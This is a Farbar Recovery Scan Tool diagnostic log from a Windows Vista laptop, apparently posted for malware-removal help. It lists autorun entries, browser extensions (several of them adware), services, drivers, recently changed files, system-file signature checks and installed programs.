(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [Windows Defender] => C:\Program Files\Windows Defender\MSASCui.exe [1008184 2008-01-21] (Microsoft Corporation)
HKLM\...\Run: [LManager] => C:\Program Files\Launch Manager\LManager.exe [768520 2008-07-25] (Dritek System Inc.)
HKLM\...\Run: [Apoint] => C:\Program Files\Apoint2K\Apoint.exe [159744 2007-07-21] (Alps Electric Co., Ltd.)
HKLM\...\Run: [WarReg_PopUp] => C:\Program Files\eMachines\WR_PopUp\WarReg_PopUp.exe [49152 2008-05-09] (eMachines)
HKLM\...\Run: [GrooveMonitor] => C:\Program Files\Microsoft Office\Office12\GrooveMonitor.exe [30040 2009-02-26] (Microsoft Corporation)
HKLM\...\Run: [Adobe ARM] => C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe [959176 2014-08-21] (Adobe Systems Incorporated)
HKLM\...\Run: [MSC] => c:\Program Files\Microsoft Security Client\msseces.exe [974432 2014-08-22] (Microsoft Corporation)
HKLM\...\Run: [MailCheck IE Broker] => C:\Program Files\WEB.DE MailCheck\IE\WEB.DE_MailCheck_Broker.exe [2135104 2014-11-17] (1und1 Mail und Media GmbH)
HKU\S-1-5-19\...\Run: [WindowsWelcomeCenter] => rundll32.exe oobefldr.dll,ShowWelcomeCenter
HKU\S-1-5-20\...\Run: [WindowsWelcomeCenter] => rundll32.exe oobefldr.dll,ShowWelcomeCenter
HKU\S-1-5-21-717213786-2690546565-922636609-1000\...\Run: [ehTray.exe] => C:\Windows\ehome\ehTray.exe [125952 2008-01-21] (Microsoft Corporation)
HKU\S-1-5-21-717213786-2690546565-922636609-1000\...\MountPoints2: F - F:\LaunchU3.exe -a
HKU\S-1-5-21-717213786-2690546565-922636609-1000\...\MountPoints2: I - I:\LaunchU3.exe -a

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Secondary Start Pages = hxxp://suche.web.de/webhp?src=br_startpage_ie
StartMenuInternet: IEXPLORE.EXE - iexplore.exe
SearchScopes: HKLM -> {67A2568C-7A0A-4EED-AECC-B5405DE63B64} URL = hxxp://www.google.com/search?sourceid=ie7&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7ACEW
SearchScopes: HKU\.DEFAULT -> {31BB071C-45F4-4DAD-BF5E-AD495B3B2FC8} URL = hxxp://suche.web.de/search/web/?su={searchTerms}&origin=searchplugin
SearchScopes: HKU\S-1-5-21-717213786-2690546565-922636609-1000 -> DefaultScope {0DE76405-1CA2-4197-98FF-E6340A0B93E8} URL = hxxp://suche.web.de/search/web/?su={searchTerms}&origin=searchplugin
SearchScopes: HKU\S-1-5-21-717213786-2690546565-922636609-1000 -> {0DE76405-1CA2-4197-98FF-E6340A0B93E8} URL = hxxp://suche.web.de/search/web/?su={searchTerms}&origin=searchplugin
BHO: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files\Microsoft Office\Office12\GrooveShellExtensions.dll (Microsoft Corporation)
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO: Windows Live Messenger Companion Helper -> {9FDDE16B-836F-4806-AB1F-1455CBEFF289} -> C:\Program Files\Windows Live\Companion\companioncore.dll (Microsoft Corporation)
BHO: WEB.DE MailCheck BHO -> {BF42D4A8-016E-4fcd-B1EB-837659FD77C6} -> C:\Program Files\WEB.DE MailCheck\IE\WEB.DE_MailCheck.dll (1und1 Mail und Media GmbH)
DPF: {E2883E8F-472F-4FB0-9522-AC9BF37916A7} hxxp://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab
Handler: grooveLocalGWS - {88FED34C-F0CA-4636-A375-3CB6248B04CD} - C:\Program Files\Microsoft Office\Office12\GrooveSystemServices.dll (Microsoft Corporation)
Handler: ms-itss - {0A9007C0-4076-11D3-8789-0000F8105754} - c:\Program Files\Common Files\Microsoft Shared\Information Retrieval\msitss.dll (Microsoft Corporation)
Handler: webde - {8FAF0273-9CA8-4efc-9536-1E35E254D5CD} - C:\Program Files\WEB.DE MailCheck\IE\WEB.DE_MailCheck.dll (1und1 Mail und Media GmbH)
Tcpip\Parameters: [DhcpNameServer] 192.168.179.1

FireFox:
========
FF ProfilePath: C:\Users\finja\AppData\Roaming\Mozilla\Firefox\Profiles\jqycb923.default
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF32_15_0_0_189.dll ()
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF Plugin: @microsoft.com/OfficeLive,version=1.5 -> C:\Program Files\Microsoft\Office Live\npOLW.dll (Microsoft Corp.)
FF Plugin: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin: @microsoft.com/WLPG,version=15.4.3555.0308 -> C:\Program Files\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin: @microsoft.com/WPF,version=3.5 -> c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll (Microsoft Corporation)
FF Plugin: Adobe Reader -> C:\Program Files\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF SearchPlugin: C:\Program Files\mozilla firefox\searchplugins\webssearches.xml
FF Extension: 06997db0c0274d5fbd37b0d9230226ea - C:\Users\finja\AppData\Roaming\Mozilla\Firefox\Profiles\jqycb923.default\Extensions\{06997db0-c027-4d5f-bd37-b0d9230226ea} [2014-11-06]
FF Extension: Microsoft .NET Framework Assistant - C:\Users\finja\AppData\Roaming\Mozilla\Firefox\Profiles\jqycb923.default\Extensions\{20a82645-c095-46ed-80e3-08825760534b}.xpi [2014-11-04]
FF Extension: PriceFountain - C:\Users\finja\AppData\Roaming\Mozilla\Firefox\Profiles\jqycb923.default\Extensions\{b6a94784-0ffb-4121-88c6-435139067ee2}.xpi [2014-11-06]
FF HKLM\...\Firefox\Extensions: [{20a82645-c095-46ed-80e3-08825760534b}] - c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension
FF Extension: Microsoft .NET Framework Assistant - c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension [2009-08-16]
FF Extension: No Name - C:\Users\finja\AppData\Roaming\Mozilla\Firefox\Profiles\jqycb923.default\extensions\1c021e811b224beba7ca0a1c@13f4ea57cb304bae95228b2f9e68.com [Not Found]
FF Extension: No Name - C:\Users\finja\AppData\Roaming\Mozilla\Firefox\Profiles\jqycb923.default\extensions\3c8f3083-413b-4aa6-ad29-fb93d8982e80@gmail.com [Not Found]
FF Extension: No Name - C:\Users\finja\AppData\Roaming\Mozilla\Firefox\Profiles\jqycb923.default\extensions\ae890d63edd74e6c8739fc18@c5d8be9efbac4fe184bfab.com [Not Found]
FF Extension: No Name - C:\Users\finja\AppData\Roaming\Mozilla\Firefox\Profiles\jqycb923.default\extensions\tylerkeith11@aol.com [Not Found]
FF Extension: No Name - C:\Users\finja\AppData\Roaming\Mozilla\Firefox\Profiles\jqycb923.default\extensions\{9015bae7-cdbb-4473-a5d0-ecfa559b2ca5}.xpi [Not Found]
FF Extension: No Name - C:\Program Files\Mozilla Firefox\browser\extensions\{972ce4c6-7e08-4474-a285-3208198ce6fd} [Not Found]
FF Extension: No Name - {9015bae7-cdbb-4473-a5d0-ecfa559b2ca5} [Not Found]
FF Extension: No Name - 1c021e811b224beba7ca0a1c@13f4ea57cb304bae95228b2f9e68.com [Not Found]
FF Extension: No Name - 3c8f3083-413b-4aa6-ad29-fb93d8982e80@gmail.com [Not Found]
FF Extension: No Name - tylerkeith11@aol.com [Not Found]
FF Extension: No Name - ae890d63edd74e6c8739fc18@c5d8be9efbac4fe184bfab.com [Not Found]
FF StartMenuInternet: FIREFOX.EXE - firefox.exe

Chrome: 
=======
CHR StartMenuInternet: Google Chrome - chrome.exe

========================== Services (Whitelisted) =================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R2 ETService; C:\Program Files\EMACHINES\eMachines Recovery Management\Service\ETService.exe [24576 2008-06-11] () [File not signed]
R2 LightScribeService; C:\Program Files\Common Files\LightScribe\LSSrvc.exe [61440 2007-01-17] (Hewlett-Packard Company) [File not signed]
R2 MBAMScheduler; C:\Program Files\ Malwarebytes Anti-Malware \mbamscheduler.exe [1871160 2014-11-21] (Malwarebytes Corporation)
R2 MBAMService; C:\Program Files\ Malwarebytes Anti-Malware \mbamservice.exe [969016 2014-11-21] (Malwarebytes Corporation)
R2 MsMpSvc; c:\Program Files\Microsoft Security Client\MsMpEng.exe [22192 2014-08-22] (Microsoft Corporation)
S2 Net Driver HPZ12; C:\Windows\system32\HPZinw12.dll [44032 2009-05-14] (Hewlett-Packard) [File not signed]
R3 NisSrv; c:\Program Files\Microsoft Security Client\NisSrv.exe [288120 2014-08-22] (Microsoft Corporation)
S2 Pml Driver HPZ12; C:\Windows\system32\HPZipm12.dll [53760 2009-05-14] (Hewlett-Packard) [File not signed]

==================== Drivers (Whitelisted) ====================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R1 DritekPortIO; C:\Program Files\Launch Manager\DPortIO.sys [20112 2006-11-02] (Dritek System Inc.)
S3 grmnusb; C:\Windows\System32\drivers\grmnusb.sys [15720 2012-04-18] (GARMIN Corp.)
S3 hitmanpro37; C:\Windows\system32\drivers\hitmanpro37.sys [35992 2014-12-05] ()
R3 MBAMProtector; C:\Windows\system32\drivers\mbam.sys [23256 2014-11-21] (Malwarebytes Corporation)
R3 MBAMSwissArmy; C:\Windows\system32\drivers\MBAMSwissArmy.sys [114904 2014-12-06] (Malwarebytes Corporation)
R3 MBAMWebAccessControl; C:\Windows\system32\drivers\mwac.sys [51928 2014-11-21] (Malwarebytes Corporation)
R0 MpFilter; C:\Windows\System32\DRIVERS\MpFilter.sys [231800 2014-07-17] (Microsoft Corporation)
S3 USB_RNDIS; C:\Windows\System32\DRIVERS\usb8023.sys [15872 2013-02-12] (Microsoft Corporation)
S3 IntcAzAudAddService; system32\drivers\RTKVHDA.sys [X]
S3 IpInIp; system32\DRIVERS\ipinip.sys [X]
S3 NwlnkFlt; system32\DRIVERS\nwlnkflt.sys [X]
S3 NwlnkFwd; system32\DRIVERS\nwlnkfwd.sys [X]

==================== NetSvcs (Whitelisted) ===================


(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)


==================== One Month Created Files and Folders ========

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-12-06 20:51 - 2014-12-06 20:51 - 00000000 ____D () C:\ProgramData\UUdb
2014-12-06 20:39 - 2014-12-06 20:39 - 00015786 _____ () C:\Users\finja\Desktop\eset.txt
2014-12-06 16:21 - 2014-12-06 16:21 - 00000634 _____ () C:\Users\finja\Desktop\JRT.txt
2014-12-06 15:41 - 2014-12-06 15:41 - 00001257 _____ () C:\Users\finja\Desktop\AdwCleaner[S3].txt
2014-12-06 15:36 - 2014-12-06 15:36 - 01707646 _____ (Thisisu) C:\Users\finja\Desktop\JRT.exe
2014-12-06 15:35 - 2014-12-06 15:35 - 02153472 _____ () C:\Users\finja\Desktop\AdwCleaner_4.104.exe
2014-12-06 10:28 - 2014-12-06 16:14 - 00001435 _____ () C:\Users\finja\Desktop\mbam.txt
2014-12-06 10:23 - 2014-12-06 10:24 - 00018716 _____ () C:\Users\finja\Desktop\gmer.txt
2014-12-06 09:22 - 2014-12-06 17:46 - 00020229 _____ () C:\Users\finja\Desktop\Addition.txt
2014-12-06 09:22 - 2014-12-06 09:22 - 00380416 _____ () C:\Users\finja\Desktop\v5shw8ku.exe
2014-12-06 09:20 - 2014-12-06 22:37 - 00012859 _____ () C:\Users\finja\Desktop\FRST.txt
2014-12-06 09:20 - 2014-12-06 22:36 - 00000000 ____D () C:\FRST
2014-12-06 09:19 - 2014-12-06 17:35 - 01111040 _____ (Farbar) C:\Users\finja\Desktop\FRST.exe
2014-12-06 09:18 - 2014-12-06 09:18 - 00000472 _____ () C:\Users\finja\Desktop\defogger_disable.log
2014-12-06 09:18 - 2014-12-06 09:18 - 00000000 _____ () C:\Users\finja\defogger_reenable
2014-12-06 09:17 - 2014-12-06 09:17 - 00050477 _____ () C:\Users\finja\Desktop\Defogger.exe
2014-12-06 08:40 - 2014-12-06 08:50 - 00003570 _____ () C:\Users\finja\Desktop\Rkill.txt
2014-12-06 08:39 - 2014-12-06 08:39 - 01944824 _____ (Bleeping Computer, LLC) C:\Users\finja\Downloads\rkill.exe
2014-12-05 21:51 - 2014-12-06 22:34 - 00114904 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-12-05 21:51 - 2014-12-05 21:53 - 00000901 _____ () C:\Users\Public\Desktop\ Malwarebytes Anti-Malware .lnk
2014-12-05 21:50 - 2014-12-05 21:53 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ Malwarebytes Anti-Malware 
2014-12-05 21:50 - 2014-12-05 21:53 - 00000000 ____D () C:\Program Files\ Malwarebytes Anti-Malware 
2014-12-05 21:50 - 2014-11-21 06:14 - 00075480 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2014-12-05 21:50 - 2014-11-21 06:14 - 00051928 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2014-12-05 21:50 - 2014-11-21 06:14 - 00023256 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys
2014-12-05 21:07 - 2014-12-06 15:35 - 00000110 _____ () C:\AdwCleanerDebug.txt
2014-12-05 21:04 - 2014-12-05 21:04 - 00000000 ____D () C:\TDSSKiller_Quarantine
2014-12-05 20:49 - 2014-12-05 20:49 - 00035992 _____ () C:\Windows\system32\Drivers\hitmanpro37.sys
2014-12-05 19:40 - 2014-12-05 19:40 - 263670483 _____ () C:\Windows\MEMORY.DMP
2014-12-05 19:40 - 2014-12-05 19:40 - 00145784 _____ () C:\Windows\Minidump\Mini120514-01.dmp
2014-12-05 19:39 - 2014-12-05 19:39 - 00000000 ____D () C:\Temp
2014-12-05 13:33 - 2014-12-05 20:08 - 00000000 ____D () C:\ProgramData\HitmanPro
2014-12-04 20:43 - 2014-12-04 20:43 - 00000000 ____D () C:\Users\finja\AppData\Local\Microsoft Corporation
2014-11-29 20:02 - 2014-11-29 20:02 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WEB.DE MailCheck
2014-11-29 20:02 - 2014-11-29 20:02 - 00000000 ____D () C:\Program Files\WEB.DE MailCheck
2014-11-27 22:42 - 2014-11-27 22:42 - 00000000 ____D () C:\Program Files\Microsoft ATS
2014-11-27 22:33 - 2014-11-27 22:33 - 11473216 _____ (Microsoft Corporation) C:\Users\finja\Downloads\mseinstall (1).exe
2014-11-27 22:31 - 2014-11-27 22:31 - 11473216 _____ (Microsoft Corporation) C:\Users\finja\Downloads\mseinstall.exe
2014-11-27 22:23 - 2014-11-27 22:23 - 00001998 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows 7 Upgrade Advisor.lnk
2014-11-27 22:23 - 2014-11-27 22:23 - 00001986 _____ () C:\Users\Public\Desktop\Windows 7 Upgrade Advisor.lnk
2014-11-27 22:23 - 2014-11-27 22:23 - 00000000 ____D () C:\Program Files\Microsoft Windows 7 Upgrade Advisor
2014-11-27 21:25 - 2014-11-27 21:25 - 00000000 ____D () C:\Windows\system32\DesktopMBRText
2014-11-25 15:33 - 2014-12-05 20:32 - 00000000 ____D () C:\ProgramData\Windows Genuine Advantage
2014-11-19 21:31 - 2014-10-24 02:03 - 00499200 _____ (Microsoft Corporation) C:\Windows\system32\kerberos.dll
2014-11-13 14:27 - 2014-11-13 14:27 - 00000951 _____ () C:\Users\finja\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2014-11-13 13:30 - 2014-11-13 13:30 - 00000000 ____D () C:\ProgramData\Malwarebytes
2014-11-13 13:25 - 2014-11-13 13:25 - 00000000 ____D () C:\Windows\ERUNT
2014-11-13 13:15 - 2014-12-06 15:37 - 00000000 ____D () C:\AdwCleaner
2014-11-13 12:54 - 2014-12-05 13:56 - 00001356 _____ () C:\Users\finja\AppData\Local\d3d9caps.dat
2014-11-12 23:01 - 2014-10-10 02:01 - 00449536 _____ (Microsoft Corporation) C:\Windows\system32\termsrv.dll
2014-11-12 23:01 - 2014-10-10 02:00 - 01259008 _____ (Microsoft Corporation) C:\Windows\system32\lsasrv.dll
2014-11-12 23:01 - 2014-10-10 02:00 - 00146432 _____ (Microsoft Corporation) C:\Windows\system32\msaudite.dll
2014-11-12 23:01 - 2014-10-10 00:22 - 00619520 _____ (Microsoft Corporation) C:\Windows\system32\adtschema.dll
2014-11-12 22:59 - 2014-09-19 01:50 - 00278528 _____ (Microsoft Corporation) C:\Windows\system32\schannel.dll
2014-11-12 22:59 - 2014-08-27 01:55 - 01249280 _____ (Microsoft Corporation) C:\Windows\system32\msxml3.dll
2014-11-12 22:59 - 2014-08-27 01:55 - 00002048 _____ (Microsoft Corporation) C:\Windows\system32\msxml3r.dll
2014-11-12 22:56 - 2014-08-12 03:25 - 00729600 _____ (Microsoft Corporation) C:\Windows\system32\IMJP10K.DLL
2014-11-12 22:53 - 2014-10-18 02:08 - 00564224 _____ (Microsoft Corporation) C:\Windows\system32\oleaut32.dll
2014-11-12 22:53 - 2014-10-03 02:18 - 00274432 _____ (Microsoft Corporation) C:\Windows\system32\AUDIOKSE.dll
2014-11-12 22:53 - 2014-10-03 02:17 - 00396800 _____ (Microsoft Corporation) C:\Windows\system32\AudioEng.dll
2014-11-12 22:53 - 2014-10-03 02:17 - 00316928 _____ (Microsoft Corporation) C:\Windows\system32\audiosrv.dll
2014-11-12 22:53 - 2014-10-03 02:17 - 00170496 _____ (Microsoft Corporation) C:\Windows\system32\EncDump.dll
2014-11-12 07:47 - 2014-10-24 02:04 - 00067072 _____ (Microsoft Corporation) C:\Windows\system32\packager.dll
2014-11-12 07:45 - 2014-10-13 00:34 - 02054656 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2014-11-11 22:20 - 2014-10-27 20:10 - 12366848 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2014-11-11 22:20 - 2014-10-27 20:05 - 01810944 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2014-11-11 22:20 - 2014-10-27 20:02 - 09739776 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2014-11-11 22:20 - 2014-10-27 19:59 - 01139712 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2014-11-11 22:20 - 2014-10-27 19:59 - 01129472 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2014-11-11 22:20 - 2014-10-27 19:58 - 01427968 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2014-11-11 22:20 - 2014-10-27 19:57 - 00231936 _____ (Microsoft Corporation) C:\Windows\system32\url.dll
2014-11-11 22:20 - 2014-10-27 19:57 - 00065536 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2014-11-11 22:20 - 2014-10-27 19:56 - 01802752 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2014-11-11 22:20 - 2014-10-27 19:56 - 00717824 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll
2014-11-11 22:20 - 2014-10-27 19:56 - 00607744 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2014-11-11 22:20 - 2014-10-27 19:56 - 00421376 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2014-11-11 22:20 - 2014-10-27 19:56 - 00142848 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2014-11-11 22:20 - 2014-10-27 19:55 - 02382848 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2014-11-11 22:20 - 2014-10-27 19:55 - 00353792 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2014-11-11 22:20 - 2014-10-27 19:55 - 00223232 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2014-11-11 22:20 - 2014-10-27 19:55 - 00073216 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2014-11-11 22:20 - 2014-10-27 19:55 - 00041472 _____ (Microsoft Corporation) C:\Windows\system32\msfeedsbs.dll
2014-11-11 22:20 - 2014-10-27 19:55 - 00011776 _____ (Microsoft Corporation) C:\Windows\system32\mshta.exe
2014-11-11 22:20 - 2014-10-27 19:55 - 00010752 _____ (Microsoft Corporation) C:\Windows\system32\msfeedssync.exe
2014-11-11 22:20 - 2014-10-27 19:54 - 00176640 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2014-11-11 08:42 - 2014-11-11 08:42 - 00000000 ____D () C:\Users\finja\AppData\Roaming\AdvancedSystemProtector
2014-11-10 21:27 - 2014-12-05 19:40 - 00000000 ____D () C:\Windows\Minidump
2014-11-08 21:59 - 2014-12-05 22:17 - 00000000 ____D () C:\ProgramData\7bb6df21-8ca8-4eec-965d-8cd2261544c7
2014-11-06 21:02 - 2014-11-06 21:02 - 00000000 ____D () C:\Users\finja\AppData\Local\Macromedia
2014-11-06 20:30 - 2014-11-06 20:30 - 00000003 _____ () C:\Users\finja\Downloads\C

==================== One Month Modified Files and Folders =======

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-12-06 21:13 - 2009-02-27 09:31 - 01243199 _____ () C:\Windows\WindowsUpdate.log
2014-12-06 20:56 - 2009-02-27 10:20 - 00000000 _____ () C:\Windows\system32\LogConfigTemp.xml
2014-12-06 20:55 - 2006-11-02 14:01 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-12-06 20:55 - 2006-11-02 13:47 - 00003216 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-1.C7483456-A289-439d-8115-601632D005A0
2014-12-06 20:55 - 2006-11-02 13:47 - 00003216 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-0.C7483456-A289-439d-8115-601632D005A0
2014-12-06 20:54 - 2006-11-02 14:01 - 00032560 _____ () C:\Windows\Tasks\SCHEDLGU.TXT
2014-12-06 17:42 - 2014-10-05 12:36 - 00000008 __RSH () C:\ProgramData\ntuser.pol
2014-12-06 17:40 - 2014-06-08 13:02 - 00140754 _____ () C:\Windows\PFRO.log
2014-12-06 17:36 - 2009-05-16 15:26 - 00000000 ____D () C:\Users\finja
2014-12-06 17:35 - 2006-11-02 12:18 - 00000000 ____D () C:\Windows\system32\GroupPolicy
2014-12-06 16:09 - 2013-11-26 19:43 - 00000000 ____D () C:\Windows\TempDF28D6CC-3D1E-B803-1F4F-B4B1FD7BEC31-Signatures
2014-12-06 15:38 - 2006-11-02 12:18 - 00000000 ____D () C:\Windows\PLA
2014-12-05 22:17 - 2014-10-28 11:28 - 00000000 ____D () C:\ProgramData\83b32e09-56dd-4d15-bbc7-350e8627ec65
2014-12-05 21:41 - 2006-11-02 12:18 - 00000000 ____D () C:\Windows\system32\LogFiles
2014-12-05 20:49 - 2014-11-02 19:50 - 00000000 ____D () C:\Windows\system32\JREMetafilePublic
2014-12-05 13:34 - 2008-01-21 08:16 - 01598580 _____ () C:\Windows\system32\PerfStringBackup.INI
2014-11-28 20:51 - 2011-04-11 19:26 - 00000000 ____D () C:\Program Files\1und1Softwareaktualisierung
2014-11-26 18:48 - 2009-05-16 15:28 - 00000000 ____D () C:\Users\finja\AppData\Roaming\Macromedia
2014-11-26 18:28 - 2008-08-15 00:15 - 00000000 ____D () C:\ProgramData\Adobe
2014-11-13 14:30 - 2014-11-04 07:52 - 00000000 ____D () C:\Program Files\Mozilla Firefox
2014-11-13 14:29 - 2008-08-15 00:11 - 00000000 ____D () C:\Program Files\Google
2014-11-13 14:27 - 2009-05-16 15:28 - 00000000 ____D () C:\Users\finja\AppData\Local\Google
2014-11-13 14:25 - 2014-11-04 07:59 - 00000000 ____D () C:\Program Files\F978377C-B7D4-4536-8E10-14CA97B13394
2014-11-13 13:55 - 2006-11-02 12:18 - 00000000 ____D () C:\Windows\rescache
2014-11-13 13:46 - 2006-11-02 12:18 - 00000000 ____D () C:\Windows\Microsoft.NET
2014-11-13 13:18 - 2011-04-11 19:27 - 00000885 _____ () C:\Users\finja\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WEB.DE.lnk
2014-11-12 23:04 - 2006-11-02 12:18 - 00000000 ____D () C:\Windows\system32\de-DE
2014-11-12 23:01 - 2008-08-15 00:16 - 00000000 ____D () C:\ProgramData\Microsoft Help
2014-11-12 22:52 - 2013-08-02 19:19 - 00000000 ____D () C:\Windows\system32\MRT
2014-11-12 22:47 - 2014-06-04 20:19 - 00000106 _____ () C:\Users\finja\AppData\Roaming\WB.CFG
2014-11-12 22:39 - 2006-11-02 11:24 - 100445232 _____ (Microsoft Corporation) C:\Windows\system32\mrt.exe
2014-11-12 22:27 - 2006-11-02 11:23 - 00000321 _____ () C:\Windows\win.ini
2014-11-12 14:45 - 2006-11-02 13:47 - 00393944 _____ () C:\Windows\system32\FNTCACHE.DAT
2014-11-08 21:15 - 2014-11-02 19:57 - 00000000 ___HD () C:\Users\Public\Temp
2014-11-06 20:56 - 2014-11-02 19:50 - 00000000 ____D () C:\Program Files\Free Flash Plugin
2014-11-06 20:49 - 2012-08-10 17:12 - 00701104 _____ (Adobe Systems Incorporated) C:\Windows\system32\FlashPlayerApp.exe
2014-11-06 20:49 - 2011-12-26 19:46 - 00071344 _____ (Adobe Systems Incorporated) C:\Windows\system32\FlashPlayerCPLApp.cpl
2014-11-06 20:49 - 2009-05-16 16:07 - 00000000 ____D () C:\Users\finja\AppData\Local\Adobe

==================== Bamital & volsnap Check =================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\explorer.exe => File is digitally signed
C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed


LastRegBack: 2014-12-06 21:02

==================== End Of Log ============================
         

Code:
ATTFilter
Additional scan result of Farbar Recovery Scan Tool (x86) Version: 06-12-2014 02
Ran by finja at 2014-12-06 22:37:27
Running from C:\Users\finja\Desktop
Boot Mode: Normal
==========================================================


==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Microsoft Security Essentials (Enabled - Up to date) {4F35CFC4-45A3-FC37-EF17-759A02E39AB1}
AS: Microsoft Security Essentials (Enabled - Up to date) {F4542E20-6399-F3B9-D5A7-4EE87964D00C}
AS: Windows Defender (Disabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

32 Bit HP CIO Components Installer (Version: 6.1.2 - Hewlett-Packard) Hidden
Activation Assistant for the 2007 Microsoft Office suites (HKLM\...\Activation Assistant for the 2007 Microsoft Office suites) (Version:  - Microsoft Corporation)
Activation Assistant for the 2007 Microsoft Office suites (Version: 1.0 - Microsoft Corporation) Hidden
Adobe AIR (HKLM\...\Adobe AIR) (Version: 3.3.0.3650 - Adobe Systems Incorporated)
Adobe Flash Player 15 ActiveX (HKLM\...\Adobe Flash Player ActiveX) (Version: 15.0.0.167 - Adobe Systems Incorporated)
Adobe Flash Player 15 Plugin (HKLM\...\Adobe Flash Player Plugin) (Version: 15.0.0.189 - Adobe Systems Incorporated)
Adobe Reader X (10.1.12) - Deutsch (HKLM\...\{AC76BA86-7AD7-1031-7B44-AA1000000001}) (Version: 10.1.12 - Adobe Systems Incorporated)
ALPS Touch Pad Driver (HKLM\...\{9F72EF8B-AEC9-4CA5-B483-143980AFD6FD}) (Version: Version 7.0.1101.18 - Alps Electric)
Bookworm Deluxe (HKLM\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-110113233}) (Version:  - Oberon Media)
Bricks of Egypt (HKLM\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-11029123}) (Version:  - Oberon Media)
Build-a-lot (HKLM\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-113537610}) (Version:  - Oberon Media)
Cake Mania (HKLM\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-111199750}) (Version:  - Oberon Media)
Chuzzle (HKLM\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-110411970}) (Version:  - Oberon Media)
D3DX10 (Version: 15.4.2368.0902 - Microsoft) Hidden
Diner Dash (HKLM\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-110305887}) (Version:  - Oberon Media)
DJ_AIO_06_F4500_SW_MIN (Version: 140.0.690.000 - Hewlett-Packard) Hidden
Dream Day First Home (HKLM\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-113832110}) (Version:  - Oberon Media)
eDeals version 1.0 (HKLM\...\eDeals_is1) (Version: 1.0 - eDeals)
